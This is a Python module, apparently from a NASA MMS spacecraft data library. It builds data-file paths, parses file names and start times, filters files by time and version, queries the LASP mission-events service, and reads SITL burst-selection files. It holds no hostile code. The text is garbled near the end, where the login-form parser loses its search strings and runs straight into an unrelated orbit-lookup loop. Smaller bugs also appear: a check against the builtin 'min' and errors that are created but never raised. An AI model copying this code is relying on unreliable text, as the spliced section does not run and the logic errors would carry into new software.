m, l, t + '*', 'v*.cdf'))\n )\n if m == 'brst'\n else\n os.path.join(root, s, i, m, l, t[0:4], t[4:6],\n '_'.join((s, i, m, l, t + '*', 'v*.cdf'))\n )\n for s in sc_ids\n for i in instr\n for m in mode\n for l in level\n for t in tstart\n ]\n else:\n paths = [os.path.join(root, s, i, m, l, o, t[0:4], t[4:6], t[6:8],\n '_'.join((s, i, m, l, o, t + '*', 'v*.cdf'))\n )\n if m == 'brst'\n else\n os.path.join(root, s, i, m, l, o, t[0:4], t[4:6],\n '_'.join((s, i, m, l, o, t + '*', 'v*.cdf'))\n )\n for s in sc_ids\n for i in instr\n for m in mode\n for l in level\n for o in optdesc\n for t in tstart\n ]\n\n # Paths\n else:\n if optdesc is None:\n paths = [os.path.join(root, s, i, m, l, t[0:4], t[4:6], t[6:8])\n if m == 'brst' else\n os.path.join(root, s, i, m, l, t[0:4], t[4:6])\n for s in sc_ids\n for i in instr\n for m in mode\n for l in level\n for t in tstart\n ]\n else:\n paths = [os.path.join(root, s, i, m, l, o, t[0:4], t[4:6], t[6:8])\n if m == 'brst' else\n os.path.join(root, s, i, m, l, o, t[0:4], t[4:6])\n for s in sc_ids\n for i in instr\n for m in mode\n for l in level\n for o in optdesc\n for t in tstart\n ]\n\n return paths\n\n\ndef download_selections_files(data_type='abs_selections',\n start_date=None, end_date=None,\n gls_type=None):\n \"\"\"\n Download SITL selections from the SDC.\n\n Parameters\n ----------\n data_type : str\n Type of SITL selections to download. Options are\n 'abs_selections', 'sitl_selections', 'gls_selections'\n gls_type : str\n Type of gls_selections. Options are\n 'mp-dl-unh'\n start_date : `dt.datetime` or str\n Start date of data interval\n end_date : `dt.datetime` or str\n End date of data interval\n\n Returns\n -------\n local_files : list\n Names of the selection files that were downloaded. Files\n can be read using mms.read_eva_fom_structure()\n \"\"\"\n\n if gls_type is not None:\n data_type = '_'.join((data_type, gls_type))\n\n # Setup the API\n api = MrMMS_SDC_API()\n api.data_type = data_type\n api.start_date = start_date\n api.end_date = end_date\n\n # Download the files\n local_files = api.download_files()\n return local_files\n\n\ndef file_start_time(file_name):\n '''\n Extract the start time from a file name.\n\n Parameters\n ----------\n file_name : str\n File name from which the start time is extracted.\n\n Returns\n -------\n fstart : `datetime.datetime`\n Start time of the file, extracted from the file name\n '''\n\n try:\n # Selections: YYYY-MM-DD-hh-mm-ss\n fstart = re.search('[0-9]{4}(-[0-9]{2}){5}', file_name).group(0)\n fstart = dt.datetime.strptime(fstart, '%Y-%m-%d-%H-%M-%S')\n except AttributeError:\n try:\n # Brst: YYYYMMDDhhmmss\n fstart = re.search('20[0-9]{2}' # Year\n '(0[0-9]|1[0-2])' # Month\n '([0-2][0-9]|3[0-1])' # Day\n '([0-1][0-9]|2[0-4])' # Hour\n '[0-5][0-9]' # Minute\n '([0-5][0-9]|60)', # Second\n file_name).group(0)\n fstart = dt.datetime.strptime(fstart, '%Y%m%d%H%M%S')\n except AttributeError:\n try:\n # Srvy: YYYYMMDD\n fstart = re.search('20[0-9]{2}' # Year\n '(0[0-9]|1[0-2])' # Month\n '([0-2][0-9]|3[0-1])', # Day\n file_name).group(0)\n fstart = dt.datetime.strptime(fstart, '%Y%m%d')\n except AttributeError:\n raise AttributeError('File start time not identified in: \\n'\n ' \"{}\"'.format(file_name))\n\n return fstart\n\n\ndef filename2path(fname, root=''):\n \"\"\"\n Convert an MMS file name to an MMS path.\n\n MMS paths take the form\n\n sc/instr/mode/level[/optdesc]/YYYY/MM[/DD/]\n\n where the optional descriptor [/optdesc] is included if it is also in the\n file name and day directory [/DD] is included if mode='brst'.\n\n Parameters\n ----------\n fname : str\n File name to be turned into a path.\n root : str\n Absolute directory\n\n Returns\n -------\n path : list\n Path to the data file.\n \"\"\"\n\n parts = parse_file_name(fname)\n\n # data_type = '*_selections'\n if 'selections' in parts[0]:\n path = os.path.join(root, parts[0])\n\n # data_type = 'science'\n else:\n # Create the directory structure\n # sc/instr/mode/level[/optdesc]/YYYY/MM/\n path = os.path.join(root, *parts[0:5], parts[5][0:4], parts[5][4:6])\n\n # Burst files require the DAY directory\n # sc/instr/mode/level[/optdesc]/YYYY/MM/DD/\n if parts[2] == 'brst':\n path = os.path.join(path, parts[5][6:8])\n\n path = os.path.join(path, fname)\n\n return path\n\n\ndef filter_time(fnames, start_date, end_date):\n \"\"\"\n Filter files by their start times.\n\n Parameters\n ----------\n fnames : str, list\n File names to be filtered.\n start_date : str\n Start date of time interval, formatted as '%Y-%m-%dT%H:%M:%S'\n end_date : str\n End date of time interval, formatted as '%Y-%m-%dT%H:%M:%S'\n\n Returns\n -------\n paths : list\n Path to the data file.\n \"\"\"\n\n # Make sure file names are iterable. Allocate output array\n files = fnames\n if isinstance(files, str):\n files = [files]\n\n # If dates are strings, convert them to datetimes\n if isinstance(start_date, str):\n start_date = dt.datetime.strptime(start_date, '%Y-%m-%dT%H:%M:%S')\n if isinstance(end_date, str):\n end_date = dt.datetime.strptime(end_date, '%Y-%m-%dT%H:%M:%S')\n\n # Parse the time out of the file name\n fstart = [file_start_time(file) for file in files]\n\n # Sort the files by start time\n isort = sorted(range(len(fstart)), key=lambda k: fstart[k])\n fstart = [fstart[i] for i in isort]\n files = [files[i] for i in isort]\n\n # End time\n # - Any files that start on or before END_DATE can be kept\n idx = [i for i, t in enumerate(fstart) if t <= end_date]\n if len(idx) > 0:\n fstart = [fstart[i] for i in idx]\n files = [files[i] for i in idx]\n else:\n fstart = []\n files = []\n\n # Start time\n # - Any file with TSTART <= START_DATE can potentially have data\n # in our time interval of interest.\n # - Assume the start time of one file marks the end time of the\n # previous file.\n # - With this, we look for the file that begins just prior to START_DATE\n # and throw away any files that start before it.\n idx = [i for i, t in enumerate(fstart) if t >= start_date]\n if (len(idx) == 0) and \\\n (len(fstart) > 0) and \\\n (fstart[-1].date() == start_date.date()):\n idx = [len(fstart) - 1]\n\n elif (len(idx) != 0) and \\\n ((idx[0] != 0) and (fstart[idx[0]] != start_date)):\n idx.insert(0, idx[0] - 1)\n\n if len(idx) > 0:\n fstart = [fstart[i] for i in idx]\n files = [files[i] for i in idx]\n else:\n fstart = []\n files = []\n\n return files\n\n\ndef filter_version(files, latest=None, version=None, min_version=None):\n '''\n Filter file names according to their version numbers.\n\n Parameters\n ----------\n files : str, list\n File names to be turned into paths.\n latest : bool\n If True, the latest version of each file type is\n returned. if `version` and `min_version` are not\n set, this is the default.\n version : str\n Only files with this version are returned.\n min_version : str\n All files with version greater or equal to this\n are returned.\n\n Returns\n -------\n filtered_files : list\n The files remaining after applying filter conditions.\n '''\n\n if version is None and min is None:\n latest = True\n if ((version is None) + (min_version is None) + (latest is None)) > 1:\n ValueError('latest, version, and min are mutually exclusive.')\n\n # Output list\n filtered_files = []\n\n # Extract the version\n parts = [parse_file_name(file) for file in files]\n versions = [part[-1] for part in parts]\n\n # The latest version of each file type\n if latest:\n # Parse file names and identify unique file types\n # - File types include all parts of file name except version number\n bases = ['_'.join(part[0:-2]) for part in parts]\n uniq_bases = list(set(bases))\n\n # Filter according to unique file type\n for idx, uniq_base in enumerate(uniq_bases):\n test_idx = [i\n for i, test_base in enumerate(bases)\n if test_base == uniq_base]\n file_ref = files[idx]\n vXYZ_ref = [int(v) for v in versions[idx].split('.')]\n\n filtered_files.append(file_ref)\n for i in test_idx:\n vXYZ = [int(v) for v in versions[i].split('.')]\n if ((vXYZ[0] > vXYZ_ref[0]) or\n (vXYZ[0] == vXYZ_ref[0] and\n vXYZ[1] > vXYZ_ref[1]) or\n (vXYZ[0] == vXYZ_ref[0] and\n vXYZ[1] == vXYZ_ref[1] and\n vXYZ[2] > vXYZ_ref[2])):\n filtered_files[-1] = files[i]\n\n # All files with version number greater or equal to MIN_VERSION\n elif min_version is not None:\n vXYZ_min = [int(v) for v in min_version.split('.')]\n for idx, v in enumerate(versions):\n vXYZ = [int(vstr) for vstr in v.split('.')]\n if ((vXYZ[0] > vXYZ_min[0]) or\n ((vXYZ[0] == vXYZ_min[0]) and\n (vXYZ[1] > vXYZ_min[1])) or\n ((vXYZ[0] == vXYZ_min[0]) and\n (vXYZ[1] == vXYZ_min[1]) and\n (vXYZ[2] >= vXYZ_min[2]))):\n filtered_files.append(files[idx])\n\n # All files with a particular version number\n elif version is not None:\n vXYZ_ref = [int(v) for v in version.split('.')]\n for idx, v in enumerate(versions):\n vXYZ = [int(vstr) for vstr in v.split('.')]\n if (vXYZ[0] == vXYZ_ref[0] and\n vXYZ[1] == vXYZ_ref[1] and\n vXYZ[2] == vXYZ_ref[2]):\n filtered_files.append(files[idx])\n\n return filtered_files\n\n\ndef mission_events(event_type, start, stop, sc=None):\n \"\"\"\n Download MMS mission events. See the filters on the webpage\n for more ideas.\n https://lasp.colorado.edu/mms/sdc/public/about/events/#/\n\n Parameters\n ----------\n event_type : str\n Type of event. Options are 'apogee', 'dsn_contact', 'orbit',\n 'perigee', 'science_roi', 'shadow', 'sitl_window', 'sroi'.\n start, stop : `datetime.datetime`, int\n Start and end of the data interval, specified as a time or\n orbit range.\n sc : str\n Spacecraft ID (mms, mms1, mms2, mms3, mms4) for which event\n information is to be returned.\n\n Returns\n -------\n data : dict\n Information about each event.\n start_time - Start time (UTC) of event %Y-%m-%dT%H:%M:%S.%f\n end_time - End time (UTC) of event %Y-%m-%dT%H:%M:%S.%f\n event_type - Type of event\n sc_id - Spacecraft to which the event applies\n source - Source of event\n description - Description of event\n discussion\n start_orbit - Orbit on which the event started\n end_orbit - Orbit on which the event ended\n tag\n id\n tstart - Start time of event as datetime\n tend - end time of event as datetime\n \"\"\"\n event_func = _get_mission_events(event_type)\n return event_func(start, stop, sc)\n\n\ndef _get_mission_events(event_type):\n if event_type == 'apogee':\n return _get_apogee\n elif event_type == 'dsn_contact':\n return _get_dsn_contact\n elif event_type == 'orbit':\n return _get_orbit\n elif event_type == 'perigee':\n return _get_perigee\n elif event_type == 'science_roi':\n return _get_science_roi\n elif event_type == 'shadow':\n return _get_shadow\n elif event_type == 'sitl_window':\n return _get_sitl_window\n elif event_type == 'sroi':\n return _get_sroi\n\n\ndef _get_apogee(start, stop, sc):\n '''\n Apogee information between `start` and `stop` and associated\n with spacecraft `sc`.\n '''\n return _mission_data(start, stop, sc=sc,\n source='Timeline', event_type='apogee')\n\n\ndef _get_dsn_contact(start, stop, sc):\n '''\n Science region of interest information between `start` and `stop`\n and associated with spacecraft `sc`. Defines the limits of when\n fast survey and burst data can be available each orbit.\n '''\n return _mission_data(start, stop, sc=sc,\n source='Timeline', event_type='dsn_contact')\n\n\ndef _get_orbit(start, stop, sc):\n '''\n Orbital information between `start` and `stop` and associated\n with spacecraft `sc`.\n '''\n return _mission_data(start, stop, sc=sc,\n source='Timeline', event_type='orbit')\n\n\ndef _get_perigee(start, stop, sc):\n '''\n Perigee information between `start` and `stop` and associated\n with spacecraft `sc`.\n '''\n return _mission_data(start, stop, sc=sc,\n source='Timeline', event_type='perigee')\n\n\ndef _get_science_roi(start, stop, sc):\n '''\n Science region of interest information between `start` and `stop`\n and associated with spacecraft `sc`. Defines the limits of when\n fast survey and burst data can be available each orbit.\n '''\n return _mission_data(start, stop, sc=sc,\n source='BDM', event_type='science_roi')\n\n\ndef _get_shadow(start, stop, sc):\n '''\n Earth shadow information between `start` and `stop` and associated\n with spacecraft `sc`.\n '''\n return _mission_data(start, stop, sc=sc,\n source='POC', event_type='shadow')\n\n\ndef _get_sroi(start, stop, sc):\n '''\n Sub-region of interest information between `start` and `stop`\n and associated with spacecraft `sc`. There can be several\n SROIs per science_roi.\n '''\n return _mission_data(start, stop, sc=sc,\n source='POC', event_type='SROI')\n\n\ndef _get_sitl_window(start, stop, sc):\n '''\n SITL window information between `start` and `stop` and associated\n with spacecraft `sc`. Defines when the SITL can submit selections.\n '''\n return _mission_data(start, stop, sc=sc,\n source='BDM', event_type='sitl_window')\n\n\ndef _mission_data(start, stop, sc=None,\n source=None, event_type=None):\n \"\"\"\n Download MMS mission events. See the filters on the webpage\n for more ideas.\n https://lasp.colorado.edu/mms/sdc/public/about/events/#/\n\n NOTE: some sources, such as 'burst_segment', return a format\n that is not yet parsed properly.\n\n Parameters\n ----------\n start, stop : `datetime.datetime`, int\n Start and end of the data interval, specified as a time or\n orbit range.\n sc : str\n Spacecraft ID (mms, mms1, mms2, mms3, mms4) for which event\n information is to be returned.\n source : str\n Source of the mission event. Options include\n 'Timeline', 'Burst', 'BDM', 'SITL'\n event_type : str\n Type of mission event. Options include\n BDM: sitl_window, evaluate_metadata, science_roi\n\n Returns\n -------\n data : dict\n Information about each event.\n start_time - Start time (UTC) of event %Y-%m-%dT%H:%M:%S.%f\n end_time - End time (UTC) of event %Y-%m-%dT%H:%M:%S.%f\n event_type - Type of event\n sc_id - Spacecraft to which the event applies\n source - Source of event\n description - Description of event\n discussion\n start_orbit - Orbit on which the event started\n end_orbit - Orbit on which the event ended\n tag\n id\n tstart - Start time of event as datetime\n tend - end time of event as datetime\n \"\"\"\n url = 'https://lasp.colorado.edu/' \\\n 'mms/sdc/public/service/latis/mms_events_view.csv'\n\n start_date = None\n end_date = None\n start_orbit = None\n end_orbit = None\n\n # mission_events() returns numpy integers, so check for\n # those, too\n if isinstance(start, (int, np.integer)):\n start_orbit = start\n else:\n start_date = start\n if isinstance(stop, (int, np.integer)):\n end_orbit = stop\n else:\n end_date = stop\n\n query = {}\n if start_date is not None:\n query['start_time_utc>'] = start_date.strftime('%Y-%m-%d')\n if end_date is not None:\n query['end_time_utc<'] = end_date.strftime('%Y-%m-%d')\n\n if start_orbit is not None:\n query['start_orbit>'] = start_orbit\n if end_orbit is not None:\n query['end_orbit<'] = end_orbit\n\n if sc is not None:\n query['sc_id'] = sc\n if source is not None:\n query['source'] = source\n if event_type is not None:\n query['event_type'] = event_type\n\n resp = requests.get(url, params=query)\n data = _response_text_to_dict(resp.text)\n\n # Convert to useful types\n types = ['str', 'str', 'str', 'str', 'str', 'str', 'str',\n 'int32', 'int32', 'str', 'int32']\n for items in zip(data, types):\n if items[1] == 'str':\n pass\n else:\n data[items[0]] = np.asarray(data[items[0]], dtype=items[1])\n\n # Add useful tags\n # - Number of seconds elapsed\n # - TAISTARTIME as datetime\n # - TAIENDTIME as datetime\n\n # NOTE! If data['TAISTARTTIME'] is a scalar, this will not work\n # unless everything after \"in\" is turned into a list\n data['tstart'] = [dt.datetime.strptime(\n value, '%Y-%m-%dT%H:%M:%S.%f'\n )\n for value in data['start_time']\n ]\n data['tend'] = [dt.datetime.strptime(\n value, '%Y-%m-%dT%H:%M:%S.%f'\n )\n for value in data['end_time']\n ]\n\n return data\n\n\ndef mission_events_v1(start_date=None, end_date=None,\n start_orbit=None, end_orbit=None,\n sc=None,\n source=None, event_type=None):\n \"\"\"\n Download MMS mission events. See the filters on the webpage\n for more ideas.\n https://lasp.colorado.edu/mms/sdc/public/about/events/#/\n\n NOTE: some sources, such as 'burst_segment', return a format\n that is not yet parsed properly.\n\n Parameters\n ----------\n start_date, end_date : `datetime.datetime`\n Start and end date of time interval. The interval is right-\n exclusive: [start_date, end_date). The time interval must\n encompass the desired data (e.g. orbit begin and end times)\n for it to be returned.\n start_orbit, end_orbit : `datetime.datetime`\n Start and end orbit of data interval. If provided with `start_date`\n or `end_date`, the two must overlap for any data to be returned.\n sc : str\n Spacecraft ID (mms, mms1, mms2, mms3, mms4) for which event\n information is to be returned.\n source : str\n Source of the mission event. Options include\n 'Timeline', 'Burst', 'BDM', 'SITL'\n event_type : str\n Type of mission event. Options include\n BDM: sitl_window, evaluate_metadata, science_roi\n\n Returns\n -------\n data : dict\n Information about each event.\n start_time - Start time (UTC) of event %Y-%m-%dT%H:%M:%S.%f\n end_time - End time (UTC) of event %Y-%m-%dT%H:%M:%S.%f\n event_type - Type of event\n sc_id - Spacecraft to which the event applies\n source - Source of event\n description - Description of event\n discussion\n start_orbit - Orbit on which the event started\n end_orbit - Orbit on which the event ended\n tag\n id\n tstart - Start time of event as datetime\n tend - end time of event as datetime\n \"\"\"\n url = 'https://lasp.colorado.edu/' \\\n 'mms/sdc/public/service/latis/mms_events_view.csv'\n\n query = {}\n if start_date is not None:\n query['start_time_utc>'] = start_date.strftime('%Y-%m-%d')\n if end_date is not None:\n query['end_time_utc<'] = end_date.strftime('%Y-%m-%d')\n\n if start_orbit is not None:\n query['start_orbit>'] = start_orbit\n if end_orbit is not None:\n query['end_orbit<'] = end_orbit\n\n if sc is not None:\n query['sc_id'] = sc\n if source is not None:\n query['source'] = source\n if event_type is not None:\n query['event_type'] = event_type\n\n resp = requests.get(url, params=query)\n data = _response_text_to_dict(resp.text)\n\n # Convert to useful types\n types = ['str', 'str', 'str', 'str', 'str', 'str', 'str',\n 'int32', 'int32', 'str', 'int32']\n for items in zip(data, types):\n if items[1] == 'str':\n pass\n else:\n data[items[0]] = np.asarray(data[items[0]], dtype=items[1])\n\n # Add useful tags\n # - Number of seconds elapsed\n # - TAISTARTIME as datetime\n # - TAIENDTIME as datetime\n # data[\"start_time_utc\"] = data.pop(\"start_time_utc \"\n # \"(yyyy-mm-dd'T'hh:mm:ss.sss)\"\n # )\n # data[\"end_time_utc\"] = data.pop(\"end_time_utc \"\n # \"(yyyy-mm-dd'T'hh:mm:ss.sss)\"\n # )\n\n # NOTE! If data['TAISTARTTIME'] is a scalar, this will not work\n # unless everything after \"in\" is turned into a list\n data['tstart'] = [dt.datetime.strptime(\n value, '%Y-%m-%dT%H:%M:%S.%f'\n )\n for value in data['start_time']\n ]\n data['tend'] = [dt.datetime.strptime(\n value, '%Y-%m-%dT%H:%M:%S.%f'\n )\n for value in data['end_time']\n ]\n\n return data\n\n\ndef parse_file_name(fname):\n \"\"\"\n Parse a file name compliant with MMS file name format guidelines.\n\n Parameters\n ----------\n fname : str\n File name to be parsed.\n\n Returns\n -------\n parts : tuple\n The tuple elements are:\n [0]: Spacecraft IDs\n [1]: Instrument IDs\n [2]: Data rate modes\n [3]: Data levels\n [4]: Optional descriptor (empty string if not present)\n [5]: Start times\n [6]: File version number\n \"\"\"\n\n parts = os.path.basename(fname).split('_')\n\n # data_type = '*_selections'\n if 'selections' in fname:\n # datatype_glstype_YYYY-mm-dd-HH-MM-SS.sav\n if len(parts) == 3:\n gls_type = ''\n else:\n gls_type = parts[2]\n\n # (data_type, [gls_type,] start_date)\n out = ('_'.join(parts[0:2]), gls_type, parts[-1][0:-4])\n\n # data_type = 'science'\n else:\n # sc_instr_mode_level_[optdesc]_fstart_vVersion.cdf\n if len(parts) == 6:\n optdesc = ''\n else:\n optdesc = parts[4]\n\n # (sc, instr, mode, level, [optdesc,] start_date, version)\n out = (*parts[0:4], optdesc, parts[-2], parts[-1][1:-4])\n\n return out\n\n\ndef parse_time(times):\n \"\"\"\n Parse the start time of MMS file names.\n\n Parameters\n ----------\n times : str, list\n Start times of file names.\n\n Returns\n -------\n parts : list\n A list of tuples. The tuple elements are:\n [0]: Year\n [1]: Month\n [2]: Day\n [3]: Hour\n [4]: Minute\n [5]: Second\n \"\"\"\n if isinstance(times, str):\n times = [times]\n\n # Three types:\n # srvy YYYYMMDD\n # brst YYYYMMDDhhmmss\n # selections YYYY-MM-DD-hh-mm-ss\n parts = [None] * len(times)\n for idx, time in enumerate(times):\n if len(time) == 19:\n parts[idx] = (time[0:4], time[5:7], time[8:10],\n time[11:13], time[14:16], time[17:]\n )\n elif len(time) == 14:\n parts[idx] = (time[0:4], time[4:6], time[6:8],\n time[8:10], time[10:12], time[12:14]\n )\n else:\n parts[idx] = (time[0:4], time[4:6], time[6:8], '00', '00', '00')\n\n return parts\n\n\ndef read_eva_fom_structure(sav_filename):\n '''\n Returns a dictionary that mirrors the SITL selections fomstr structure\n that is in the IDL .sav file.\n\n Parameters\n ----------\n sav_filename : str\n Name of the IDL sav file containing the SITL selections\n\n Returns\n -------\n data : dict\n The FOM structure.\n valid : 1 if the fom structure is valid, 0 otherwise\n error : Error string for invalid fom structures\n algversion\n sourceid : username of the SITL that made the selections\n cyclestart\n numcycles\n nsegs : number of burst segments\n start : index into timestamps of start time for each burst segment\n stop : index into timestamps of stop time for each burst segment\n seglengths\n fom : figure of merit for each burst segment\n nubffs\n mdq : mission data quality\n timestamps : timestamp (TAI seconds since 1958) of each mdq\n targetbuffs\n fomave\n targetratio\n minsegmentsize\n maxsegmentsize\n pad\n searchratio\n fomwindowsize\n fomslope\n fomskew\n fombias\n metadatainfo\n oldestavailableburstdata :\n metadataevaltime\n discussion : description of each burst segment given by the SITL\n note : note given by SITL to data within SITL window\n datetimestamps : timestamps converted to datetimes\n start_time : start time of the burst segment\n end_time : end time of the burst segment\n tstart : datetime timestamp of the start of each burst segment\n tstop : datetime timestamp of the end of each burst segment\n '''\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n sav = readsav(sav_filename)\n\n assert 'fomstr' in sav, 'save file does not have a fomstr structure'\n fomstr = sav['fomstr']\n\n # Handle invalid structures\n # - example: abs_selections_2017-10-29-09-25-34.sav\n if fomstr.valid[0] == 0:\n d = {'valid': int(fomstr.valid[0]),\n 'error': fomstr.error[0].decode('utf-8'),\n 'errno': int(fomstr.errno[0])\n }\n return d\n\n d = {'valid': int(fomstr.valid[0]),\n 'error': fomstr.error[0],\n 'algversion': fomstr.algversion[0].decode('utf-8'),\n 'sourceid': [x.decode('utf-8') for x in fomstr.sourceid[0]],\n 'cyclestart': int(fomstr.cyclestart[0]),\n 'numcycles': int(fomstr.numcycles[0]),\n 'nsegs': int(fomstr.nsegs[0]),\n 'start': fomstr.start[0].tolist(),\n 'stop': fomstr.stop[0].tolist(),\n 'seglengths': fomstr.seglengths[0].tolist(),\n 'fom': fomstr.fom[0].tolist(),\n 'nbuffs': int(fomstr.nbuffs[0]),\n 'mdq': fomstr.mdq[0].tolist(),\n 'timestamps': fomstr.timestamps[0].tolist(),\n 'targetbuffs': int(fomstr.targetbuffs[0]),\n 'fomave': float(fomstr.fomave[0]),\n 'targetratio': float(fomstr.targetratio[0]),\n 'minsegmentsize': float(fomstr.minsegmentsize[0]),\n 'maxsegmentsize': float(fomstr.maxsegmentsize[0]),\n 'pad': int(fomstr.pad[0]),\n 'searchratio': float(fomstr.searchratio[0]),\n 'fomwindowsize': int(fomstr.fomwindowsize[0]),\n 'fomslope': float(fomstr.fomslope[0]),\n 'fomskew': float(fomstr.fomskew[0]),\n 'fombias': float(fomstr.fombias[0]),\n 'metadatainfo': fomstr.metadatainfo[0].decode('utf-8'),\n 'oldestavailableburstdata': fomstr.oldestavailableburstdata[0].decode('utf-8'),\n 'metadataevaltime': fomstr.metadataevaltime[0].decode('utf-8')\n }\n try:\n d['discussion'] = [x.decode('utf-8') for x in fomstr.discussion[0]]\n except AttributeError:\n d['discussion'] = ['ABS Selections'] * len(d['start'])\n try:\n d['note'] = fomstr.note[0].decode('utf-8')\n except AttributeError:\n d['note'] = 'ABS Selections'\n\n # Convert TAI to datetime\n # - timestaps are TAI seconds elapsed since 1958-01-01\n # - tt2000 are nanoseconds elapsed since 2000-01-01\n t_1958 = epochs.CDFepoch.compute_tt2000([1958, 1, 1, 0, 0, 0, 0, 0, 0])\n tepoch = epochs.CDFepoch()\n d['datetimestamps'] = tepoch.to_datetime(\n np.asarray(d['timestamps']) * int(1e9) +\n t_1958\n )\n\n # FOM structure (copy procedure from IDL/SPEDAS/EVA)\n # - eva_sitl_load_soca_simple\n # - eva_sitl_strct_read\n # - mms_convert_from_tai2unix\n # - mms_tai2unix\n if 'fomslope' in d:\n if d['stop'][d['nsegs'] - 1] >= d['numcycles']:\n raise ValueError('Number of segments should be <= # cycles.')\n\n taistarttime = []\n taiendtime = []\n tstart = []\n tstop = []\n t_fom = [d['datetimestamps'][0]]\n fom = [0]\n dtai_last = (d['timestamps'][d['numcycles'] - 1] -\n d['timestamps'][d['numcycles'] - 2])\n dt_last = (d['datetimestamps'][d['numcycles'] - 1] -\n d['datetimestamps'][d['numcycles'] - 2])\n\n # Extract the start and stop times of the FOM values\n # Create a time series for FOM values\n for idx in range(d['nsegs']):\n taistarttime.append(d['timestamps'][d['start'][idx]])\n tstart.append(d['datetimestamps'][d['start'][idx]])\n if d['stop'][idx] <= d['numcycles'] - 1:\n taiendtime.append(d['timestamps'][d['stop'][idx] + 1])\n tstop.append(d['datetimestamps'][d['stop'][idx] + 1])\n else:\n taiendtime.append(d['timestamps'][d['numcycles'] - 1] + dtai_last)\n tstop.append(d['datetimestamps'][d['numcycles'] - 1] + dt_last)\n\n # Append the last time stamp to the time series\n t_fom.append(d['datetimestamps'][d['numcycles'] - 1] + dt_last)\n fom.append(0)\n\n # BAK structure\n else:\n raise NotImplemented('BAK structure has not been implemented')\n nsegs = len(d['fom']) # BAK\n\n # Add to output structure\n d['taistarttime'] = taistarttime\n d['taiendtime'] = taiendtime\n d['start_time'] = [t.strftime('%Y-%m-%d %H:%M:%S') for t in tstart]\n d['stop_time'] = [t.strftime('%Y-%m-%d %H:%M:%S') for t in tstop]\n d['tstart'] = tstart\n d['tstop'] = tstop\n d['createtime'] = [file_start_time(sav_filename)] * d['nsegs']\n\n return d\n\n\ndef read_gls_csv(filename):\n \"\"\"\n Read a ground loop selections (gls) CSV file.\n\n Parameters\n ----------\n filename : str\n Name of the CSV file to be read\n\n Returns\n -------\n data : dict\n Data contained in the CSV file\n \"\"\"\n # Dictionary to hold data from csv file\n keys = ['start_time', 'stop_time', 'sourceid', 'fom', 'discussion',\n 'taistarttime', 'taiendtime', 'tstart', 'tstop', 'createtime']\n data = {key: [] for key in keys}\n\n # CSV files have their generation time in the file name.\n # Multiple CSV files may have been created for the same\n # data interval, which results in duplicate data. Use\n # a set to keep only unique data entries.\n tset = set()\n nold = 0\n\n # Constant for converting times to TAI seconds since 1958\n t_1958 = epochs.CDFepoch.compute_tt2000([1958, 1, 1, 0, 0, 0, 0, 0, 0])\n\n # Parse each row of all files\n skip_file = False\n nentry_skip = 0\n nentry_expand = 0\n with open(filename) as f:\n fstart = file_start_time(filename)\n\n reader = csv.reader(f)\n for row in reader:\n tstart = dt.datetime.strptime(\n row[0], '%Y-%m-%d %H:%M:%S'\n )\n tstop = dt.datetime.strptime(\n row[1], '%Y-%m-%d %H:%M:%S'\n )\n\n # Convert times to TAI seconds since 1958\n t0 = _datetime_to_list(tstart)\n t1 = _datetime_to_list(tstop)\n t0 = int((epochs.CDFepoch.compute_tt2000(t0) - t_1958) // 1e9)\n t1 = int((epochs.CDFepoch.compute_tt2000(t1) - t_1958) // 1e9)\n\n # Ensure selections have a minimum length of 10 seconds\n if (t1 - t0) == 0:\n t1 += int(10)\n tstop += dt.timedelta(seconds=10)\n row[1] = dt.datetime.strftime(\n tstop, '%Y-%m-%d %H:%M:%S'\n )\n nentry_expand += 1\n\n # Some burst segments are unrealistically long\n # - Usually, the longest have one selection per file\n if ((t1 - t0) > 3600):\n with open(filename) as f_test:\n nrows = sum(1 for row in f_test)\n if nrows == 1:\n skip_file = True\n break\n\n # Some entries have negative durations\n if (t1 - t0) < 0:\n nentry_skip += 1\n continue\n\n # Store data\n data['taistarttime'].append(t0)\n data['taiendtime'].append(t1)\n data['start_time'].append(row[0])\n data['stop_time'].append(row[1])\n data['fom'].append(float(row[2]))\n data['discussion'].append(','.join(row[3:]))\n data['tstart'].append(tstart)\n data['tstop'].append(tstop)\n data['createtime'].append(fstart)\n\n # Source ID is the name of the GLS model\n parts = parse_file_name(filename)\n data['sourceid'].extend([parts[1]] * len(data['fom']))\n\n # Errors\n data['errors'] = {'fskip': skip_file,\n 'nexpand': nentry_expand,\n 'nskip': nentry_skip\n }\n\n return data\n\n\ndef _sdc_parse_form(r):\n '''Parse key-value pairs from the log-in form\n\n Parameters\n ----------\n r (object): requests.response object.\n\n Returns\n -------\n form (dict): key-value pairs parsed from the form.\n '''\n # Find action URL\n pstart = r.text.find('', pstart)\n paction = r.text.find('action', pstart, pend)\n pquote1 = r.text.find('\"', pstart, pend)\n pquote2 = r.text.find('\"', pquote1 + 1, pend)\n url5 = r.text[pquote1 + 1:pquote2]\n url5 = url5.replace(':', ':')\n url5 = url5.replace('/', '/')\n\n # Parse values from the form\n pinput = r.text.find('', pinput)\n\n # Name\n pname = r.text.find('name', pinput, pend)\n pquote1 = r.text.find('\"', pname, pend)\n pquote2 = r.text.find('\"', pquote1 + 1, pend)\n name = r.text[pquote1 + 1:pquote2]\n\n # Value\n if pname != -1:\n pvalue = r.text.find('value', pquote2 + 1, pend)\n pquote1 = r.text.find('\"', pvalue, pend)\n pquote2 = r.text.find('\"', pquote1 + 1, pend)\n value = r.text[pquote1 + 1:pquote2]\n value = value.replace(':', ':')\n\n # Extract the values\n inputs[name] = value\n\n # Next iteraction\n pinput = r.text.find(' orbits['tstart'][idx]) and (time < orbits['tend'][idx]):\n orbit = orbits['start_orbit'][idx]\n if orbit is None:\n ValueError('Did not find correct orbit!')\n\n return orbit\n\n\nif __name__ == '__main__':\n '''Download data'''\n\n # Inputs common to each calling sequence\n sc = sys.argv[0]\n instr = sys.argv[1]\n mode = sys.argv[2]\n level = sys.argv[3]\n\n # Basic dataset\n if len(sys.argv) == 7:\n optdesc = None\n start_date = sys.argv[4]\n end_date = sys.argv[5]\n\n # Optional descriptor given\n elif len(sys.argv) == 8:\n optdesc = sys.argv[4]\n start_date = sys.argv[5]\n end_date = sys.argv[6]\n\n # Error\n else:\n raise TypeError('Incorrect number if inputs.')\n\n # Create the request\n api = MrMMS_SDC_API(sc, instr, mode, level,\n optdesc=optdesc, start_date=start_date, end_date=end_date)\n\n # Download the data\n files = api.download_files()\n\ndef sort_files(files):\n \"\"\"\n Sort MMS file names by data product and time.\n\n Parameters:\n files : str, list\n Files to be sorted\n\n Returns\n -------\n sorted : tuple\n Sorted file names. Each tuple element corresponds to\n a unique data 